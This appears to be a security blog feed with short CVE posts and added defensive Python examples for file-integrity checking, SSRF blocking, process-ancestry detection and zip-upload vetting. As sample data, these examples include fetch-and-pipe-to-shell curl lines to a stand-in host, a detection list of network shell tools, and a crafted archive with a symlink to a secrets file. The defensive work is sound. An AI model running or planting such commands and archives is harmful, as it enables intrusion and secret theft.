Suriq - Always on Watch


Practitioner cybersecurity analysis from the Suriq desk.
What to patch, what to detect, and why it matters, in plain English.

Managed security built on Wazuh. suriq.io

#Cyber #ThreatDetection #CVE #CISA #Cybersecurity


One seizure, two devices. The locked iPhone was read end to end. The encrypted MacBook beside it gave up nothing.

The difference was each device's encryption state at the moment it was grabbed, not the lock screen: an iPhone that has been unlocked once since boot still holds its data-protection keys in memory, while an encrypted MacBook whose keys are not in memory holds nothing to read.

The defender lesson for any device that can be seized:

https://suriq.io/blog/cellebrite-seized-device-encryption-lesson

#infosec #cybersecurity

🔴 EXPLOITED

Your file-integrity monitor is green. /bin/su was just rewritten anyway.

Linux kernel root bugs (DirtyClone, pedit COW) rewrite a binary's pages in the page cache only. The copy on disk never changes, so mtime, ctime and inotify never fire.

Run multi-tenant Linux? Patch, and disable unprivileged user namespaces until every node is on a fixed kernel (user.max_user_namespaces=0, or kernel.unprivileged_userns_clone=0 on Debian and Ubuntu kernels; both also break rootless containers).

https://suriq.io/blog/dirtyclone-linux-page-cache-privesc

#CVE #Linux #infosec #cybersecurity
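An added example (not Suriq's or Wazuh's code) of the check a file-integrity scan can add for this class of bug. A normal read() is served from the page cache, so it returns the tampered bytes; an O_DIRECT read bypasses the cache and returns what is actually on the block device. Agreement between the two is the normal state, and a mismatch is the signal. The sysctl names are the upstream and Debian/Ubuntu toggles; the sample "binary" the self-check writes is constructed, and O_DIRECT is reported as unsupported (not as clean) on filesystems such as tmpfs that refuse it.

```python
# Added example: detect a page-cache-only edit by hashing a file twice, once through the
# page cache and once with O_DIRECT, and report whether unprivileged user namespaces are open.
import errno
import hashlib
import mmap
import os
import tempfile
from typing import Optional

BLOCK = 1 << 20  # 1 MiB; an anonymous mmap is page-aligned, which O_DIRECT requires


def sha256_via_page_cache(path: str) -> str:
    """Ordinary read(): served from the page cache, so a cache-only edit shows up here."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(BLOCK), b""):
            h.update(chunk)
    return h.hexdigest()


def sha256_via_direct_io(path: str) -> Optional[str]:
    """O_DIRECT read: bypasses the page cache and hashes the bytes on the block device.
    Returns None where the filesystem does not support O_DIRECT (tmpfs, some overlayfs)."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    except OSError as e:
        if e.errno in (errno.EINVAL, errno.EOPNOTSUPP):
            return None
        raise
    h = hashlib.sha256()
    buf = mmap.mmap(-1, BLOCK)  # aligned buffer for direct I/O
    try:
        remaining = os.fstat(fd).st_size
        while remaining > 0:
            n = os.readv(fd, [buf])
            if n == 0:
                break
            n = min(n, remaining)
            h.update(buf[:n])
            remaining -= n
    except OSError as e:
        if e.errno in (errno.EINVAL, errno.EOPNOTSUPP):
            return None
        raise
    finally:
        buf.close()
        os.close(fd)
    return h.hexdigest()


def check_binary(path: str) -> dict:
    """Compare the two views. 'page-cache-diverges' means disk is untouched but memory is not."""
    cached = sha256_via_page_cache(path)
    on_disk = sha256_via_direct_io(path)
    if on_disk is None:
        status = "direct-io-unsupported"
    elif on_disk == cached:
        status = "clean"
    else:
        status = "page-cache-diverges"
    return {"path": path, "page_cache": cached, "on_disk": on_disk, "status": status}


def unprivileged_userns_allowed() -> bool:
    """True if an unprivileged user can still create user namespaces.
    Checks the upstream limit first, then the Debian/Ubuntu-specific toggle."""
    try:
        with open("/proc/sys/user/max_user_namespaces") as f:
            if int(f.read().strip()) == 0:
                return False
    except OSError:
        pass
    try:
        with open("/proc/sys/kernel/unprivileged_userns_clone") as f:
            return f.read().strip() != "0"
    except OSError:
        return True  # toggle absent: upstream default permits it


def self_check() -> dict:
    """Run check_binary on a constructed fake ELF written to a temp file (sample input, not /bin/su)."""
    data = b"\x7fELF" + bytes(range(256)) * 3000
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(data)
        path = tmp.name
    try:
        result = check_binary(path)
    finally:
        os.unlink(path)
    result["expected"] = hashlib.sha256(data).hexdigest()
    return result


if __name__ == "__main__":
    for binary in ("/bin/su", "/usr/bin/sudo", "/usr/bin/passwd"):
        if os.path.exists(binary):
            print(check_binary(binary))
    print("unprivileged userns allowed:", unprivileged_userns_allowed())
```

Run it from a scheduled scan, not from an inotify hook, because nothing in this attack generates an event to hook. A divergence on a setuid binary is worth an immediate isolation, since the tampered copy is what every exec() of that file is currently running.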

Starting a fresh Signal account won't save you here.

Russian intelligence is phishing users for one secret: the Backup Recovery Key that decrypts your whole message history. It never expires.

Never paste it into a message, a form or a "support" chat, whoever asks.

https://suriq.io/blog/signal-recovery-key-phishing-russia

#Detection #Phishing #infosec #cybersecurity

A PDF feature can be turned into a window into your servers.

php-weasyprint (1.2M+ installs) would fetch attacker-controlled URLs server-side while rendering, so cloud metadata endpoints and local files on the server were both in reach.

Run it? Upgrade to 2.6.0. (CVE-2026-49359)

https://suriq.io/blog/php-weasyprint-ssrf-file-disclosure

#CVE #CloudSecurity #infosec #cybersecurity
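An added example (not php-weasyprint's code; written in Python rather than PHP so it runs here) of the outbound-fetch policy a server-side renderer needs before it touches a URL that came from a document: allow only http and https, resolve the host once, refuse any answer in a loopback, private, link-local (which covers the 169.254.169.254 metadata address) or IPv4-mapped range, and pin the vetted address so a DNS-rebinding second lookup cannot swap in a private one. The DNS table is constructed for the offline demo; the hostnames in it are assumptions.

```python
# Added example: SSRF guard for a server-side URL fetch (e.g. images referenced from HTML
# about to be rendered to PDF). Not php-weasyprint's own code.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "::ffff:0:0/96",
)]

# Constructed DNS table for the offline demo; stands in for real resolution.
CONSTRUCTED_DNS = {
    "cdn.example.com": ["203.0.113.10"],
    "rebind.example.com": ["203.0.113.10", "10.0.0.5"],  # one public, one private answer
    "metadata.internal": ["169.254.169.254"],
}


def fake_resolve(host, port, family=0, type=0, proto=0, flags=0):
    """Offline stand-in for socket.getaddrinfo, same return shape."""
    try:
        ips = [str(ipaddress.ip_address(host))]  # literal address, no lookup needed
    except ValueError:
        ips = CONSTRUCTED_DNS.get(host)
    if not ips:
        raise socket.gaierror(-2, "Name or service not known")
    return [(socket.AF_INET6 if ":" in ip else socket.AF_INET,
             socket.SOCK_STREAM, socket.IPPROTO_TCP, "", (ip, port)) for ip in ips]


def _blocked(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped:  # ::ffff:127.0.0.1 is still loopback
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETS)


def vet_fetch(url: str, resolve=socket.getaddrinfo):
    """Return (ok, reason, pinned_ip). The caller must connect to pinned_ip with the Host
    header taken from the URL, and must re-run this check on every redirect."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed", None
    host = parts.hostname
    if not host:
        return False, "no host", None
    if parts.username or parts.password:
        return False, "credentials in URL", None
    try:
        port = parts.port or (443 if parts.scheme.lower() == "https" else 80)
    except ValueError:
        return False, "bad port", None
    try:
        infos = resolve(host, port, proto=socket.IPPROTO_TCP)
    except socket.gaierror as e:
        return False, f"dns: {e}", None
    ips = sorted({info[4][0] for info in infos})
    if not ips:
        return False, "dns: no addresses", None
    bad = [ip for ip in ips if _blocked(ip)]
    if bad:  # any private answer poisons the whole name; do not pick a "good" one
        return False, f"resolves to blocked address {bad[0]}", None
    return True, "ok", ips[0]


if __name__ == "__main__":
    for u in ("https://cdn.example.com/logo.png", "file:///etc/passwd",
              "http://169.254.169.254/latest/meta-data/", "http://rebind.example.com/x"):
        print(u, "->", vet_fetch(u, resolve=fake_resolve))
```

The same policy belongs in front of every fetch the renderer makes, including CSS imports, fonts and redirects, since each is a second chance to reach an internal address.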

🔴 EXPLOITED

Cisco Unified CM can be exploited to root.

But only if WebDialer is on, and it ships off by default. Check before you panic-patch.

The "active exploitation" reported so far is one source dropping a test file. (CVE-2026-20230)

https://suriq.io/blog/cisco-unified-cm-cve-2026-20230-exploited

#CVE #infosec #cybersecurity

A guest virtual machine can read its host's memory.

A patched flaw in libslirp, the user-mode networking backend QEMU uses by default in dev and CI setups, lets a guest with root inside the VM read gigabytes of the QEMU process's memory on the host.

Run QEMU VMs? Update libslirp to 4.9.2.

https://suriq.io/blog/qemu-libslirp-guest-reads-host-memory

#infosec #cybersecurity

🔴 EXPLOITED

Patched in May. Being exploited in June.

If you self-host UniFi OS Server, anyone who can reach its web page can get root with no login.

Update to 5.0.8 now and lock down who can reach it. (CVE-2026-34908/909/910)

https://suriq.io/blog/unifi-os-server-unauth-root-exploited

#CVE #CISAKEV #infosec #cybersecurity

A video file your server opens by itself can run an attacker's commands.

PixelSmash (CVE-2026-8461) hits anything built on FFmpeg: Jellyfin, Nextcloud, your own upload pipelines.

Update FFmpeg to 8.1.2, including the copies bundled inside those applications, then alert on ffmpeg or ffprobe spawning a shell or a downloader.

https://suriq.io/blog/pixelsmash-ffmpeg-media-pipeline-rce

#CVE #SupplyChain #Detection #infosec
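An added example (not Suriq's, Wazuh's or FFmpeg's code) of the detection the post asks for: flag a shell, interpreter or downloader whose process ancestry includes ffmpeg or ffprobe. The events are constructed here in a generic process-exec shape (pid, ppid, exe, cmdline); map your own feed (auditd EXECVE, an eBPF exec tracer, Sysmon for Linux) onto those four fields. The host and media paths in the sample are assumptions.

```python
# Added example: process-ancestry rule for "media tool spawned a shell". Not Suriq's or FFmpeg's code.
import json
import os
from typing import Dict, List

MEDIA_TOOLS = {"ffmpeg", "ffprobe"}  # add services that link libavcodec in-process
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "zsh", "python3", "perl", "curl", "wget", "nc", "ncat"}

# Constructed sample feed: a Jellyfin transcode and a Nextcloud preview job, one legitimate
# cron shell, and two shells that should fire.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"pid": 100, "ppid": 1,   "exe": "/usr/bin/jellyfin",                "cmdline": "jellyfin"},
    {"pid": 200, "ppid": 100, "exe": "/usr/lib/jellyfin-ffmpeg/ffmpeg",  "cmdline": "ffmpeg -i /media/upload.mkv -f hls out.m3u8"},
    {"pid": 202, "ppid": 100, "exe": "/usr/bin/ffprobe",                 "cmdline": "ffprobe /media/upload.mkv"},
    {"pid": 201, "ppid": 200, "exe": "/bin/sh",                          "cmdline": "sh -c curl http://203.0.113.7/s | sh"},
    {"pid": 300, "ppid": 1,   "exe": "/usr/sbin/cron",                   "cmdline": "cron"},
    {"pid": 301, "ppid": 300, "exe": "/bin/sh",                          "cmdline": "sh -c /etc/cron.hourly/logrotate"},
    {"pid": 400, "ppid": 1,   "exe": "/usr/sbin/php-fpm8.2",             "cmdline": "php-fpm: pool www"},
    {"pid": 401, "ppid": 400, "exe": "/usr/bin/ffmpeg",                  "cmdline": "ffmpeg -i /data/previews/in.mp4 -frames 1 out.jpg"},
    {"pid": 402, "ppid": 401, "exe": "/usr/bin/curl",                    "cmdline": "curl http://203.0.113.7/p -o /tmp/p"},
])


def load_events(text: str) -> List[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def ancestry(table: Dict[int, dict], pid: int) -> List[str]:
    """Basenames from the process up through every ancestor still in the table."""
    chain, seen = [], set()
    while pid in table and pid not in seen:
        seen.add(pid)
        chain.append(os.path.basename(table[pid]["exe"]).split("-")[0] if False else os.path.basename(table[pid]["exe"]))
        pid = table[pid]["ppid"]
    return chain


def normalise(name: str) -> str:
    """php-fpm8.2 -> php-fpm, ffmpeg6 -> ffmpeg, so version suffixes don't dodge the rule."""
    return name.rstrip("0123456789.")


def detect(events: List[dict]) -> List[dict]:
    table = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        child = normalise(os.path.basename(e["exe"]))
        if child not in SUSPICIOUS_CHILDREN:
            continue
        chain = [normalise(n) for n in ancestry(table, e["pid"])]
        via = [n for n in chain[1:] if n in MEDIA_TOOLS]
        if via:
            alerts.append({"pid": e["pid"], "child": child, "via": via[0],
                           "chain": chain, "cmdline": e.get("cmdline", "")})
    return alerts


if __name__ == "__main__":
    for alert in detect(load_events(SAMPLE_EVENTS)):
        print(json.dumps(alert))
```

Walking the full ancestry rather than only the direct parent matters because exploit payloads often go shell, then downloader, then a second shell; every step after the first still has ffmpeg above it. Expect a small allowlist for pipelines that legitimately wrap ffmpeg in a shell script, keyed on the script path rather than on the shell.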

A single Budibase app builder can read every secret on your server.

A rigged app-icon upload reads the server's master keys; with those an attacker forges an admin token and reaches every workspace.

Self-hosted? Update to 3.39.9 and rotate every secret, since patching alone does not revoke keys that were already read. (CVE-2026-54352)

https://suriq.io/blog/budibase-pwa-zip-symlink-file-read

#CVE #infosec #cybersecurity
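The post does not spell out the mechanism; the slug names a symlink inside the uploaded zip. This added example (not Budibase's code) assumes that pattern and shows the inspection an upload handler needs before it extracts or serves anything from a user-supplied archive: reject symlink members (a link named icon.png that points at a secrets file is read back as the icon), absolute or `..` paths, and oversized members. The archive, the link target and the size limit are all constructed for the demo.

```python
# Added example: vet a user-uploaded zip before extraction. Not Budibase's own code.
import io
import os
import posixpath
import shutil
import stat
import zipfile
from typing import List, Tuple

MAX_MEMBER_BYTES = 5 * 1024 * 1024  # assumed ceiling for an icon bundle


def build_sample_zip(clean: bool = False) -> bytes:
    """Constructed upload: a manifest and icon, plus (unless clean) a symlink member
    pointing at an assumed secrets path and a path-traversal member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.json", '{"name": "demo"}')
        zf.writestr("icon.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 64)
        if not clean:
            link = zipfile.ZipInfo("icon-192.png")
            link.create_system = 3  # Unix; mode bits live in the high 16 bits of external_attr
            link.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(link, "/home/budibase/.env")  # link target, constructed path
            zf.writestr("../../etc/config.json", "{}")
    return buf.getvalue()


def unsafe_entries(zip_bytes: bytes) -> List[Tuple[str, str]]:
    """(member name, reason) for every member that must not be extracted or served."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for zi in zf.infolist():
            name = zi.filename.replace("\\", "/")
            mode = zi.external_attr >> 16
            if stat.S_ISLNK(mode):
                target = zf.read(zi).decode("utf-8", "replace")
                findings.append((zi.filename, "symlink -> " + target))
            elif name.startswith("/") or ".." in name.split("/"):
                findings.append((zi.filename, "path traversal"))
            elif zi.file_size > MAX_MEMBER_BYTES:
                findings.append((zi.filename, "member too large"))
    return findings


def safe_extract(zip_bytes: bytes, dest: str) -> List[str]:
    """Refuse the whole upload if anything is unsafe; otherwise write members as plain files
    (never as links, whatever the archive claims). Returns the paths written."""
    bad = unsafe_entries(zip_bytes)
    if bad:
        raise ValueError(f"rejected upload: {bad}")
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for zi in zf.infolist():
            if zi.is_dir():
                continue
            target = os.path.join(dest, posixpath.normpath(zi.filename))
            os.makedirs(os.path.dirname(target) or dest, exist_ok=True)
            with zf.open(zi) as src, open(target, "wb") as dst:
                shutil.copyfileobj(src, dst)
            written.append(target)
    return written


if __name__ == "__main__":
    print(unsafe_entries(build_sample_zip()))
    print(unsafe_entries(build_sample_zip(clean=True)))
```

Rejecting the upload outright is deliberate: an archive that contains one symlink or traversal member was built to attack the extractor, and silently skipping the bad member still leaves an attacker-shaped bundle on the server.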

Apple can't patch this one.

A cable and two seconds give boot-level control of older iPhones, iPads and Watches (A12/A13 chips).

It won't hand over your data on its own, but since the bootrom can't be updated, physical custody is now the real control.

https://suriq.io/blog/usbliter8-apple-bootrom-unpatchable-exploit

#CVE #infosec #cybersecurity